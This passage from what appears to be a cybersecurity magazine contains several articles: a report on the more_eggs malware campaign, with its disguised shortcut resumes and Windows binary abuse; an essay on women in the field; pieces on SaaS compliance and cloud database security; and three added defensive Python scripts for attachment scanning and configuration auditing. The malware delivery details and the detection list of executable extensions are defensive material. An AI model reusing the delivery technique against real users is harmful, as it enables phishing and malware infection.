accounting firm, an employee of the firm received what they thought was a candidate’s resume. However,
the resume was the VenomLNK malware. Once VenomLNK was executed, it proceeded to execute
TerraLoader so that TerraLoader could load various information-stealing modules and intrusion modules
belonging to the more_eggs suite. With the 2022 campaign, however, there were two notable differences:
In place of the previously abused Windows process cmstp.exe (which manages network
connections), more_eggs was abusing ie4uinit.exe, another Windows process, to load its
malicious plugins.
Rather than targeting hopeful candidates looking for work, the hackers targeted businesses
looking for employees.
Protecting Against More_Eggs
“Thus far we are seeing threat campaigns involving more_eggs just a few times a year, unlike some
other cyberthreats,” said Rob McLeod, Vice President of eSentire’s Threat Response Unit. “This, in
addition to the campaigns’ spearphishing component, indicates to me that the threat actors using
more_eggs are extremely selective and patient. It is important that companies and public entities,
especially those in critical infrastructure sectors, consider adopting the following security
recommendations.”
Cybersecurity Protection Tips
Security Awareness Training for All Employees. Security awareness training should be
mandated for all company employees. The training should ensure that employees:
Avoid downloading and executing files from unverified sources. For example, be wary of
Word and Excel documents sent from an unknown source or acquired from the Internet that
prompt you to ‘Enable Macros’.
Avoid free versions of paid software.
Always inspect the full URL before downloading files to ensure it matches the source (e.g.,
Microsoft Teams should come from a Microsoft domain).
Inspect file extensions. Do not trust the filetype logo alone. An executable file can be
disguised as a PDF or office document.
Ensure standard procedures are in place for employees to submit potentially malicious
content for review.
Anti-virus isn’t enough. Malware that abuses Living Off the Land Binaries (LOLBins) bypasses
binary detection approaches. Therefore, Endpoint Detection and Response (EDR) agents need
to be installed on all hosts. An EDR solution is a necessary technology for detecting threats
such as more_eggs, and EDR agents must be continuously monitored and updated with the
evolving threat landscape. If not, critical alerts will not be triaged and investigated. Managed
Detection and Response (MDR) providers offer this service. Robust and comprehensive MDR
services require an AI-powered Extended Detection and Response (XDR) technology platform
so that the hundreds of daily security signals generated by an organization’s EDR agents can
be promptly ingested, analyzed and responded to. Security events which can be resolved
through an automated response are processed, while security events requiring a hands-on
response are handled by the MDR’s cybersecurity analysts and threat hunters.
Monitor the Threat Landscape. Organizations must have access to relevant threat
intelligence, and it must be actioned in a timely fashion. Internal security teams need to be
specifically informed about their operating environment, working in concert with their external
security provider.
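As an added defensive illustration of the delivery pattern described in the component breakdown above (a zipped shortcut posing as a resume beside a benign decoy PDF) and of the “inspect file extensions” tip, the following Python script scans a ZIP attachment and flags members whose content does not match their name. This is example code, not eSentire or TRU tooling; the archive it inspects is constructed inline and contains no real more_eggs sample.

```python
"""Scan a ZIP attachment for a Windows shortcut posing as a document.

Added defensive example, not eSentire/TRU tooling. The archive below is
constructed inline to mimic the delivery pattern described in the article:
a benign decoy PDF beside a .lnk file named like a resume. No real samples.
"""
import io
import os
import zipfile
from typing import Dict, List

# Shell Link (.lnk) header: HeaderSize 0x0000004C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046}, both stored little-endian.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")
PDF_MAGIC = b"%PDF-"
ZIP_MAGIC = b"PK\x03\x04"                      # .docx/.xlsx/.pptx are ZIP containers
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # legacy .doc/.xls
PE_MAGIC = b"MZ"

# Extensions a hiring manager expects on a resume, and the content kind
# that should sit behind each of them.
DOCUMENT_EXTENSIONS = {
    ".pdf": "pdf", ".docx": "office", ".xlsx": "office", ".pptx": "office",
    ".doc": "ole", ".xls": "ole", ".rtf": "rtf",
}
# Extensions that execute on double-click. Explorer never shows .lnk, even
# with "Hide extensions for known file types" off, so "Resume.pdf.lnk"
# is displayed as "Resume.pdf".
EXECUTABLE_EXTENSIONS = {".lnk", ".exe", ".scr", ".js", ".jse", ".vbs",
                         ".hta", ".bat", ".cmd", ".ps1", ".wsf"}


def content_kind(head: bytes) -> str:
    """Classify a member by its leading bytes rather than by its name."""
    if head.startswith(LNK_MAGIC):
        return "lnk"
    if head.startswith(PE_MAGIC):
        return "pe"
    if head.startswith(PDF_MAGIC):
        return "pdf"
    if head.startswith(ZIP_MAGIC):
        return "office"
    if head.startswith(OLE_MAGIC):
        return "ole"
    if head.startswith(b"{\\rtf"):
        return "rtf"
    return "unknown"


def scan_archive(data: bytes) -> List[Dict[str, object]]:
    """Return one finding per suspicious member of the ZIP held in `data`."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(64)          # only the header is needed
            parts = os.path.basename(info.filename).lower().split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            kind = content_kind(head)
            reasons = []
            if ext in EXECUTABLE_EXTENSIONS:
                reasons.append(f"executable extension {ext}")
            if kind == "lnk":
                reasons.append("Windows shortcut header")
            if kind == "pe":
                reasons.append("PE executable header")
            # "resume.pdf.lnk": a document extension hidden in front of a real one
            if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTENSIONS:
                reasons.append(f"document extension .{parts[-2]} hidden before {ext}")
            # "resume.pdf" whose bytes are not a PDF at all
            if ext in DOCUMENT_EXTENSIONS and kind != DOCUMENT_EXTENSIONS[ext]:
                reasons.append(f"content ({kind}) does not match {ext}")
            if reasons:
                findings.append({"name": info.filename, "kind": kind,
                                 "reasons": reasons})
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: decoy PDF plus a shortcut named like a PDF resume."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Jane Doe Resume.pdf", PDF_MAGIC + b"1.7\n% decoy body\n")
        zf.writestr("Jane Doe Resume.pdf.lnk", LNK_MAGIC + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_archive()):
        print(finding["name"], "->", "; ".join(finding["reasons"]))
```

Run against real mail attachments, the same checks can feed the "submit potentially malicious content for review" procedure from the tips above; the decoy PDF passes cleanly while the shortcut is flagged on three counts.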
Learn more about eSentire’s industry renowned Threat Response Unit.
Read eSentire’s latest Security Advisories and Reports.
About the Author
Keegan Keplinger is the Research and Reporting
Lead for the Threat Response Unit at eSentire. He
conducts threat research and disseminates reports on
threat activity with the goal of understanding threat
actor behavior and economics. Keegan has an
undergraduate degree in physics and graduate
degrees in neuroscience and applied mathematics; he
originally joined eSentire as the Data Visualization
Lead on the Threat Intelligence team in 2017, but
quickly evolved into a broader role in detection
engineering, conducting threat hunts, and reporting on previously unobserved threat activity.
Keegan can be reached online at Keegan.Keplinger@esentire.com and at our company website
https://www.esentire.com/.
Barriers To Entry Must Be Brought Down If
More Women Are to Enter Cybersecurity
By Sydney Asensio, Head of Operations at 2020 Partners
As a woman who has recently entered the cybersecurity field, I can safely say that I viewed it as an
intimidating, male-dominated career path. That perception needs to change if we are to see more women
build careers in cybersecurity. For an industry that is built on innovation and being fast paced, this should
be very achievable.
Every single day, businesses face new risks and threats that need to be protected against. And one of
the best ways that we as an industry can do that is by realizing that different skillsets and mindsets are
advantageous. Do I feel the industry is averse to this, or against having more women in the field?
Absolutely not. Work has already been undertaken into creating equal opportunities for both men and
women in cyber, yet it remains that only 24% of the workforce are female.
Now more than ever, companies are creating enticing brand statements, promoting attractive benefit
packages, and offering training and certification programs to appeal to skilled prospects.
Cybersecurity organizations now need to prioritize eradicating the remaining false perceptions through
encouraging messages towards women, to successfully break biases and make them feel empowered
about pursuing a job in cybersecurity.
Are the perceptions fair, and justified?
We have already witnessed the growth of initiatives to help support and act as a platform for women
looking to enter the industry, including WiCyS (Women in CyberSecurity) and WoSEC (Women of
Cybersecurity). They’re aiming to unite aspiring women in cyber through collaboration, networking, and
mentoring, but how often is this same initiative being prioritized within a company?
Unconscious biases exist within every sector, as well as pretty much everywhere else in this world. The
attitude of “jobs are meant for X because of Y” is no one’s fault, but we need to work hard to rid ourselves of that
misperception. Research from tech giant Samsung last year showed that 44% of workers said they
believe certain jobs are exclusively male or female. And 17% of women have also not applied for a job
for fear of being discriminated against because of their gender.
Before entering the cybersecurity sector, my professional background was in client relations and sales,
without a drop of cyber experience. I was worried about the male-dominated industry and found myself
feeling intimidated, questioning my ability to stand out and succeed in cybersecurity. That was until I
realized the value of the transferable skills that I had developed through my previous experience as well
as my endeavor to develop industry-specific knowledge. Coupled with a strong support network around
me, these fears are long gone, and I can now see the endless opportunities for women in cybersecurity,
regardless of their background in the sector.
Leadership and management roles, advisory, and customer relations positions are paramount to
business and industry success, and create countless opportunities for new talent to take the reins and
become a huge driving force for the sector. The business of cyber is extensive, and there are countless
opportunities for newcomers, especially women, with different backgrounds who will add greater value to
a company.
How can businesses expedite the situation?
With it being such a dynamic landscape, encouraging more women to operate in the cybersecurity
industry can help introduce new perspectives and ways of thinking to help combat the ever-changing
threat landscape. It is vital that we endeavor to make women feel empowered to be part of a growing
industry, a tactic that all organizations should be encouraged to adopt. Only then will applicants of all
backgrounds gain the confidence to take steps towards cyber.
There are currently over three million unfilled positions in the cyber industry, and that number is still
growing. It’s important for companies to be inclusive and make themselves more attractive to women with
different backgrounds and skillsets. This includes shaping their messaging, having a strong female
leadership presence, promoting mentorship programs to help sculpt future female leaders, and offering
certification and training programs for upskilling opportunities. It’s about championing those already
contributing to the greatness of the industry and replacing old misperceptions with truthful representations
of the sector.
Creating a positive step change
It is going to be difficult to fight against the human nature behind perceptions, but it is very possible. Aside
from ensuring business messaging is tailored to all groups of people, from any walk of life, there are
several other approaches that organizations can take to help close the gap.
Firstly, it’s crucial to remember that all perceptions and stigmas start having an impact on individuals
before their careers begin. Efforts should be made early on in educational settings to encourage the next
generation of women to not fear or shy away from paths previously deemed to be male-dominated, and
companies can work specifically with educators and parents to tackle the issue from all angles.
Establishing a strong support network early on is fundamental. Having connections to those already in
the industry, ready to give you a helping hand whenever you need it, is extremely valuable.
The gender gap isn’t a tick-box exercise for businesses to fix; it is an underappreciated area that needs
genuine effort from all sides. By promoting strong, exciting female role models, from leadership
positions through to entry-level roles, organizations will change perceptions on a daily basis. The
more we see these people doing their jobs, the greater our opportunity to trigger real and lasting change.
The next generation of talent must be welcomed into the industry with open arms, if they are to one day
take over the mantle of responsibility.
About the Author
Having graduated from Florida International University in 2014, Sydney
has acted in a number of managerial and sales roles before becoming
Head of Operations at 2020 Partners in February 2021 as her first step
into the cybersecurity industry. During her time so far in the industry,
Sydney has recognized the need for perceptions to be changed for
women to be more actively encouraged to join.
Sydney can be reached online at
https://www.linkedin.com/in/sydneyasensio/ and at our company
website https://2020partners.co
To Secure SaaS, Combine Top Compliance
Frameworks with an SSPM
The explosion in the number and variety of SaaS apps used by enterprises has created both opportunities
and challenges. While the cybersecurity department’s mission is to ensure that their security hygiene
remains intact, they need an accurate and comprehensive understanding of the potential attack surface
of their SaaS stack.
By Maor Bin, CEO & Co-Founder, Adaptive Shield
As organizations continue to grow their SaaS environments, new challenges emerge which have them
asking some critical new questions: How can I comply with the major industry standards and manage a
SaaS security audit? How do I keep customer, partner, and employee data protected throughout the
SaaS stack? There are standards and compliance mandates available, like National Institute of
Standards and Technology (NIST) and Service Organization Controls (SOC), which have been created
to help organizations ensure the highest security hygiene. And when it comes to SaaS app security, these
frameworks and processes can be achieved with support from a SaaS Security Posture Management
(SSPM) tool.
NIST (National Institute of Standards and Technology)
NIST’s Cybersecurity Framework (CSF) combines a host of approaches to dealing with cyber security
threats, including setting up procedures, training, defining roles, auditing, and monitoring. While it’s true
that many of NIST’s recommendations have been geared towards the classic legacy critical infrastructure
security challenge, the CSF and its updates, SP 800-53, can help organizations better respond to the risks
that occur in SaaS-based work environments.
An SSPM solution helps incorporate these recommendations into an organization’s SaaS environment
in an easy-to-use fashion, by taking complex controls such as “Network Access To Non-Privileged
Accounts” (SP 800-53 IA-2 (2)) and turning them into tangible configurations that can be monitored and
remediated across all SaaS platforms. The same is true for multi-configuration requirements such as
NIST CSF PR.AC-7, which demands not only identifying the authentication method but also matching it
to asset risk. Only an advanced SSPM solution can provide the required depth of visibility into
authentication methods by user and device from a risk perspective.
SOC 2
Whether you are a public or private company, businesses are placing increasing value on SOC 2
compliance. Unlike SOC 1, which centers on internal controls for financial reporting, the purpose of the
SOC 2 report is to evaluate an organization’s information systems, specifically regarding security,
availability, processing integrity, confidentiality, and privacy, over a period of time.
When a company conducts a SOC 2 audit, it must run security checks across its SaaS stack. These checks
will look for misconfigured settings, lack of privacy controls, lack of modern security methods, and lack of
access controls.
Managing SaaS Security Posture
The NIST CSF and SP 800-53 standards, and compliance mandates like SOC 2, each in turn help a
company demonstrate its commitment to security and protecting data. But adhering to NIST and SOC 2
is far more challenging in the growing world of SaaS.
It requires businesses to demonstrate the ability to continuously monitor security across their entire SaaS
environment, which in many cases is growing at breakneck speed. There is a misconception that achieving
and maintaining compliance in this new realm is the SaaS provider’s responsibility; the reality is that
while SaaS providers put the necessary security measures in place, the responsibility for using them falls
to the customer and its security team.
This introduces a variety of new challenges. First and foremost, security teams that are stretched thin are
now burdened with the massive undertaking of knowing every application, user, and configuration and
ensuring all are compliant with industry and company policies. Just imagine being asked to manage
50,000 users over just five SaaS apps. That would require the security team to manage 250,000
identities. Further, SaaS environments aren’t static; they are dynamic and continually evolving as
employees are added or removed, new applications are onboarded, and permissions and configurations
are updated.
Taking these factors into account, it’s unrealistic to expect security teams to continuously ensure all
configurations are enforced company-wide and ensure they meet compliance standards without an
automated tool.
This is why SSPM is so vital. With an SSPM solution, organizations can map out all the user permissions,
encryption settings, certificates, and security configurations available for each SaaS application. This
provides visibility into user privileges and sensitive permissions and allows teams to correct any
misconfiguration in these areas, taking into consideration each SaaS application's unique features and
usability. As a result, whether a company has 25 SaaS apps or 500, it can more easily comply with its own
company standards, industry standards such as NIST, and compliance mandates such as SOC 2.
If you are planning to introduce SSPM or are already using one, I recommend making sure the solution
can compare your SaaS security misconfiguration checks with the major industry standards and that
you have the ability to build your own custom company policy.
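To make that comparison concrete, here is a small policy-as-code sketch in Python, added to this page as an illustration; it is not part of Adaptive Shield's product or of the original article. It runs a baseline set of checks plus one custom company check over a constructed snapshot of three SaaS tenants and groups the failures by framework reference. The control identifiers attached to each check are an illustrative mapping, not an authoritative one, and the tenant settings are constructed sample data.

```python
"""SaaS posture checks as policy-as-code, mapped to NIST SP 800-53, NIST CSF and SOC 2.

Added example, not Adaptive Shield's code. The tenant settings and the control references
attached to each check are constructed for illustration; replace the mapping with your own
before relying on it for an audit.
"""
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Check:
    check_id: str
    description: str
    passes: Callable[[dict], bool]   # True when the tenant's settings satisfy the check
    controls: tuple                  # illustrative framework references for this check


@dataclass(frozen=True)
class Finding:
    app: str
    check_id: str
    description: str
    controls: tuple


# Baseline checks that the major standards all have an equivalent for (mapping illustrative).
INDUSTRY_BASELINE = (
    Check("mfa-enforced", "MFA is required for every user",
          lambda s: s.get("mfa") == "required",
          ("NIST SP 800-53 IA-2", "NIST CSF PR.AC-7", "SOC 2 CC6.1")),
    Check("no-public-sharing", "Default link sharing is not public",
          lambda s: s.get("default_share") != "public",
          ("NIST SP 800-53 AC-3", "NIST CSF PR.AC-4", "SOC 2 CC6.3")),
    Check("admin-ratio", "Admins are at most 5% of users",
          lambda s: s.get("admins", 0) <= 0.05 * s.get("users", 0),
          ("NIST SP 800-53 AC-6", "NIST CSF PR.AC-4", "SOC 2 CC6.3")),
    Check("session-timeout", "Sessions expire within 24 hours",
          lambda s: 0 < s.get("session_hours", 0) <= 24,
          ("NIST SP 800-53 AC-12", "SOC 2 CC6.1")),
)

# Custom company policy layered on top of the industry baseline.
COMPANY_POLICY = (
    Check("sso-only", "Logins are allowed only through corporate SSO",
          lambda s: s.get("sso_only") is True,
          ("NIST SP 800-53 IA-5", "NIST CSF PR.AC-1", "SOC 2 CC6.1")),
)

# Constructed snapshot of three SaaS tenants, as an SSPM connector might return it.
SAMPLE_TENANTS = {
    "crm":       {"mfa": "required", "default_share": "internal", "users": 4800,
                  "admins": 12, "session_hours": 12, "sso_only": True},
    "filestore": {"mfa": "optional", "default_share": "public", "users": 5100,
                  "admins": 300, "session_hours": 720, "sso_only": False},
    "chat":      {"mfa": "required", "default_share": "internal", "users": 5000,
                  "admins": 20, "session_hours": 24, "sso_only": True},
}


def evaluate(tenants, checks=INDUSTRY_BASELINE + COMPANY_POLICY):
    """Run every check against every tenant; a missing setting counts as a failure."""
    findings = []
    for app in sorted(tenants):
        for check in checks:
            if not check.passes(tenants[app]):
                findings.append(Finding(app, check.check_id, check.description, check.controls))
    return findings


def by_control(findings):
    """Group failures by framework reference, the view an auditor asks for."""
    grouped = {}
    for f in findings:
        for control in f.controls:
            grouped.setdefault(control, []).append((f.app, f.check_id))
    return grouped


if __name__ == "__main__":
    results = evaluate(SAMPLE_TENANTS)
    for f in results:
        print(f"{f.app:10} FAIL {f.check_id:18} {f.description}  [{', '.join(f.controls)}]")
    for control, hits in sorted(by_control(results).items()):
        print(f"{control}: {len(hits)} failing check(s)")
```

The point of the two tuples is the recommendation above: the baseline is what you compare against industry standards, and COMPANY_POLICY is where your own rules go without touching the baseline.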
About the Author
Maor Bin is the CEO and Co-Founder of Adaptive Shield. A former
Cybersecurity Intelligence Officer in the Israel Defense Forces
(IDF), Bin has over 16 years in cybersecurity leadership. In his
career, he led SaaS Threat Detection Research at Proofpoint and
won the operational excellence award during his IDF service. Maor
can be reached online at https://www.linkedin.com/in/maorbin/ and
at our company website https://www.adaptive-shield.com/.
Great Power Brings Great Responsibility:
How to Keep Cloud Databases Secure in an
Uncertain World
By Bryan Alsdorf, Director of IT and Head of Information Security, MariaDB Corporation
To paraphrase a mantra popularized by Spider-Man: With great power comes great responsibility. It may
sound corny. But, with the rise of massive data informing so many aspects of our lives directly and
indirectly, this well-known wisdom is especially true when it comes to building databases capable of
managing that exponential data growth.
Consider that global data creation is projected to reach more than 180 zettabytes by 2025,
according to Statista research. PC Magazine notes that “one zettabyte is enough storage for 30 billion
4K movies, 60 billion video games, or 7.5 trillion MP3 songs.” Amid this juggernaut surge, it’s cloud
databases, in particular, that are the scalable powerhouses helping businesses organize, understand
and use their own ever-expanding data to create value. The great responsibility comes in keeping all the
data protected.
SaaS Vulnerabilities Mean More Data Breaches
The dramatically improved scalability and redundancy of cloud databases are a developmental
benchmark in the history of technology, and those traits are transforming how businesses can interact
with data. But a misconfiguration, all too easy to trigger, can expose data to the internet, bots and bad
actors. Data breaches stemming from different kinds of infrastructure and application vulnerabilities are
common. What’s reported in the news is the tip of the iceberg in the cyber attack landscape. Insider
threats and attacks exploiting poor east-west security (i.e., inside a network) are relentless.
Earlier this year, Block (formerly known as Square) acknowledged that Cash App was breached by a
former employee, leaking personally identifiable information and possibly impacting as many as eight
million customers. Mailchimp’s breach of hundreds of accounts resulted from unauthorized access of a
customer support and account administration tool. Lapsus$ Group’s breach of Okta in March, a
company whose value lies in its B2B SAML authentication product, also happened via a third-party
customer support tool. Lapsus$ hit Azure DevOps software too in March, but Microsoft was able to
contain the breach before data was exfiltrated. Nevertheless, developer and cloud security experts are
on high alert, especially with the pervasiveness of Log4j vulnerabilities, the reach of which may be
unprecedented.
Cyber criminals, like Lapsus$, are generally motivated by profit, so they attempt ransomware, DDoS and
other kinds of attacks and use extortion to make money. While these profiteering exploits are already
ubiquitous, the current geopolitical struggle among superpowers and their client-states across the globe
means that attacks which deliberately sow chaos and terror, as a goal in and of itself, outside of profit,
will likely rise in prominence too. The U.S. government warnings for businesses to be ready have been
clear.
Readiness Is Tougher for SMBs
In the next few years, many cloud security providers will do extremely well financially from all the
investment that will go into them. The better vetted providers’ services are, the more likely those providers
will grow and generate significant cash flow. Enterprises are pulling out their proverbial checkbooks,
hoping to fortify multiple layers of security now to avoid paying more down the road.
How companies can distinguish between a security provider that's offering excellent, multi-faceted data
protection and one whose solutions might not be fully baked is a good question, and it presents a sort of
Catch-22. Companies must employ at least a few highly competent professionals who already have
knowledge of what constitutes good security in order to evaluate tools. This can be a challenge for a lot
of organizations, but especially for smaller ones. Small and medium-sized businesses (SMBs) can
struggle to maintain in-house experts to secure their systems, choose the right security vendors, mitigate
attacks and implement recovery. SMBs also might have an expert who knows what to do, but who
doesn’t have the resources to do it. Some SMBs are simply operating on slim margins, without deep
pockets to pay ransoms. They face even more uncertainty right now if they exist in an industry or segment
of the supply chain that’s targeted for geopolitical reasons. Having distributed, remote workforces as the
new normal furthers the challenges.
So, this is the moment where those building future-proofed cloud tools and services can step in and help
SMBs, as well as large enterprises. Keeping cloud databases secure is central to minimizing the damage
attackers can do and reducing the strain on limited resources.
What Does Cloud Database Security Look Like in a Zero-Trust World?
VPNs and perimeter security are fast becoming anachronisms in a world of distributed workers and
systems, and of cyber attackers who have long since figured out how to breach the traditional network
shield. Zero trust approaches to security are indeed the way forward, where no entity is trusted and only
those privileges needed for a person, application or microservice to complete its task are granted. To use
an office metaphor, a worker must swipe a badge to get into the building, but there are still doors that are
bolted and, within accessible rooms, desks and filing cabinets with their own locks. Just because
someone’s authorized to be in the office, doesn't mean they’re authorized to look at all the files.
Cloud databases are a special animal when it comes to zero-trust security. They have complex properties
but, right now, beyond access policies, zero trust is enforced at the application level and in the movement
of data to and fro, rather than inside the database itself. It may be that row-level and field-level encryption
can be embedded in a cloud database, but that’s not a feature in general use now.
That said, here are the must-haves for security:
• Choose a cloud database with configurations that are secure by default, not open by default.
Misconfiguration is one of the biggest causes of data breaches. This doesn’t necessarily mean that
every dial is turned to the most locked-down setting, but a well-configured security baseline is a
must-have. A vendor that offers 24/7 help with configuration and other questions from experts
intimately familiar with the nitty-gritty of the chosen database isn’t a bad idea either.
• Use network isolation with a virtual private cloud (VPC) or a private link. It’s a best practice to
keep a cloud database completely isolated from the public internet. Ensure there is no way for an
external connection to reach your database.
• If not using a VPC, restrict access by IP address not just on the firewall, but at the database and
database proxy level. A firewall rule cannot distinguish between an approved user and an attacker
coming from the same address range, and maintaining thousands of firewall rules adds complexity.
Firewall the database off completely by default, then explicitly add addresses to an allow-list to grant
access, so that no external connection is permitted except the ones you explicitly add. (In MariaDB
and MySQL the host part of an account, such as 'app'@'10.0.1.%', is where this restriction lives at the
database level.)
• Enforce unique accounts with strong passwords. Give each application server and each user its
own account, give every account a strong password, and rotate those passwords. Reusing accounts
and passwords increases the risk of exposure and makes activity impossible to attribute.
• Use multi-factor authentication and enhanced, granular access control that continually re-validates
entities seeking data. Limit accounts to the data they need to access. That is, enforce least-privilege
access to sensitive data and implement alerts on suspicious activity and policy violations. As humans,
we sometimes want to be flexible with teams, but even well-intentioned people make honest
mistakes. Resist the urge to be lax with least-privilege rules. Keep good separation of roles and
functions, and control DBA access to the database activity stream.
• Monitor database activity rigorously. Monitoring the real-time stream of database activity for
unusual or non-compliant behavior helps protect against insider risk. Use policy-based monitoring
and enforcement, and make sure you can detect database misconfigurations that expose
vulnerabilities.
• Implement key data protection measures, including encryption of data in transit and at rest
(backups included), and automate the patching of vulnerabilities.
• Make sure offsite logs and backups are immutable. Logs and backups should be protected from
everyone, including your own administrative accounts, so that attackers who compromise DBA
credentials cannot go in and delete them. Backups must be set in stone.
• In a system built on a cloud microservices architecture, use microsegmentation for “east-west”
communications inside the network; it isolates workloads in order to neutralize malicious lateral
movement. With this approach, a service mesh proxy can enforce policy on each workload’s traffic,
for example denying a service any path to the database port, so that a packet from a compromised
service never reaches the database, containing the breach.
• Have a clear, detailed plan ready for major events such as cloud outages, ransomware attacks and
data breaches. Talk to your cloud vendor about this and coordinate plans. The major cloud providers
all suffer outages regularly; they are usually confined to particular regions or data centers, so they
often go unnoticed. A plan should explain exactly how the team is expected to respond to a disaster
and who does what. It should specify who to contact at your cloud vendor to help with the
investigation of a data breach, and the vendor should have a plan for working with customers who
experience breaches. Backups that attackers can’t touch should be ready, with the plan specifying how
to roll out a restored backup.
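As an added example for this page (not MariaDB Corporation's code), the following Python script applies the access-control items above to the output of SHOW GRANTS: it flags accounts reachable from any host, application accounts holding global ALL PRIVILEGES or WITH GRANT OPTION, and network accounts without REQUIRE SSL, and it prints the hardened form of an application grant. The grant lines it parses are constructed samples in MariaDB's SHOW GRANTS format; the PASSWORD EXPIRE INTERVAL clause in the hardened statement assumes MariaDB 10.4 or later.

```python
"""Audit MariaDB/MySQL account grants against the must-haves above: no wildcard hosts,
no blanket privileges, no GRANT OPTION for application accounts, and TLS required for
any account that connects over the network. Also emits the hardened form of a grant.

Added example, not MariaDB Corporation's code. The SHOW GRANTS output below is constructed;
in practice feed the audit the real output of SHOW GRANTS FOR each account.
"""
import re
from dataclasses import dataclass

# One SHOW GRANTS line:
#   GRANT <privs> ON <scope> TO `user`@`host` [IDENTIFIED ...] [REQUIRE ...] [WITH GRANT OPTION]
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"[`']?(?P<user>[^`'@]+)[`']?@[`']?(?P<host>[^`'\s]+)[`']?(?P<rest>.*)$",
    re.IGNORECASE,
)

ADMIN_ACCOUNTS = frozenset({"root"})       # may hold ALL PRIVILEGES, but only from localhost
LOCAL_HOSTS = frozenset({"localhost", "127.0.0.1", "::1"})


@dataclass(frozen=True)
class Finding:
    user: str
    host: str
    check: str
    detail: str


def parse_grants(lines):
    """Group SHOW GRANTS lines by (user, host) -> list of {privs, scope, options}."""
    accounts = {}
    for raw in lines:
        line = raw.strip().rstrip(";")
        if not line:
            continue
        m = GRANT_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised grant line: {line}")
        entry = {
            "privs": {p.strip().upper() for p in m["privs"].split(",")},
            "scope": m["scope"].replace("`", ""),
            "options": m["rest"].upper(),
        }
        accounts.setdefault((m["user"], m["host"]), []).append(entry)
    return accounts


def audit(accounts):
    """Apply the four checks to every account; returns one Finding per violation."""
    findings = []
    for (user, host), grants in sorted(accounts.items()):
        local = host in LOCAL_HOSTS
        trusted_admin = user in ADMIN_ACCOUNTS and local
        options = " ".join(g["options"] for g in grants)
        if host.startswith("%"):
            findings.append(Finding(user, host, "wildcard-host",
                                    "reachable from any address; pin the host to the app subnet"))
        if not trusted_admin and any("ALL PRIVILEGES" in g["privs"] and g["scope"] == "*.*"
                                     for g in grants):
            findings.append(Finding(user, host, "all-privileges",
                                    "global ALL PRIVILEGES; grant only what the app needs, per table"))
        if not trusted_admin and "WITH GRANT OPTION" in options:
            findings.append(Finding(user, host, "grant-option",
                                    "account can hand out privileges; reserve this for DBAs"))
        if not local and "REQUIRE SSL" not in options and "REQUIRE X509" not in options:
            findings.append(Finding(user, host, "no-tls",
                                    "network account without REQUIRE SSL; traffic may cross the wire in clear"))
    return findings


def hardened_grant(user, host, db, table, privs, password_placeholder="<strong-random-secret>"):
    """Least-privilege account: pinned host, TLS required, scoped privileges, forced rotation."""
    account = f"`{user}`@`{host}`"
    return [
        f"CREATE USER IF NOT EXISTS {account} IDENTIFIED BY '{password_placeholder}' "
        f"REQUIRE SSL PASSWORD EXPIRE INTERVAL 90 DAY;",
        f"GRANT {', '.join(privs)} ON `{db}`.`{table}` TO {account};",
    ]


# Constructed SHOW GRANTS output for four accounts ('*<hash>' stands in for a password hash).
SAMPLE_SHOW_GRANTS = [
    "GRANT USAGE ON *.* TO `orders_api`@`10.0.1.%` IDENTIFIED BY PASSWORD '*<hash>' REQUIRE SSL",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.`orders` TO `orders_api`@`10.0.1.%`",
    "GRANT ALL PRIVILEGES ON *.* TO `legacy_app`@`%` IDENTIFIED BY PASSWORD '*<hash>' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO `reporting`@`10.0.2.17` IDENTIFIED BY PASSWORD '*<hash>'",
    "GRANT SELECT ON `shop`.* TO `reporting`@`10.0.2.17`",
    "GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA unix_socket WITH GRANT OPTION",
]

if __name__ == "__main__":
    for f in audit(parse_grants(SAMPLE_SHOW_GRANTS)):
        print(f"{f.user}@{f.host}: {f.check}: {f.detail}")
    print("\n".join(hardened_grant("orders_api", "10.0.1.%", "shop", "orders",
                                   ["SELECT", "INSERT", "UPDATE"])))
```

In the sample, orders_api is the shape you want (pinned subnet, table-scoped privileges, TLS required) and legacy_app is the shape the list above warns against; the audit reports nothing for the former and four findings for the latter.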
Businesses across verticals and at all resource levels are increasingly relying on data to function and to
deliver new value. These security measures for cloud databases are the last line of defense in keeping
data protected. Security decision-makers at companies small and large should talk with vendors directly
and make sure that their first focus is on security that’s built to complement performance, rather than
compete with it. Study reviews and articles on trusted sites. Go to webinars, talk to trusted colleagues
and reach out to industry peers in reputable organizations. And feel free to reach out to me! Risking a
data breach because it seems like your hands are tied is no longer an option for businesses in a world of
exponential data growth, evolving technology and deep uncertainty.
About the Author
Bryan Alsdorf, Director of IT and Head of Information Security, oversees
all IT and security operations at MariaDB. Bryan has more than 25 years
of IT industry experience including 14 years at MariaDB and 5 years at
MySQL. Bryan can be reached online at
https://www.linkedin.com/in/bryanalsdorf/ and at our company website
https://mariadb.com/.
Cybersecurity: Why We’re Stronger Together
Advocating for greater security collaboration between businesses, law enforcement and
government
By Nicole Mills, Exhibition Director at Infosecurity Group
Cybercrime is on an extremely worrying trajectory.
A previous survey of global IT security decision makers conducted by Statista revealed that 46.4% of
organizations had endured between one and five successful cyber-attacks in the 12 months ended
November 2020. Since then, Accenture has reported that such attacks increased 31% between 2020
and 2021.
As we now move through 2022, this concerning reality is further compounded by even more frightening
figures.
According to IBM, the average cost of a data breach last year was $4.24 million, and this number is
predicted to rise in 2022. As a result, Cisco and Cybersecurity Ventures together suggest that by
2025 the global cost of cybercrime could exceed $10 trillion.
The Infosecurity Group Advisory Council, comprising industry leaders at the cutting edge of cybersecurity
solutions, highlights many varying factors contributing to this broad and growing challenge.
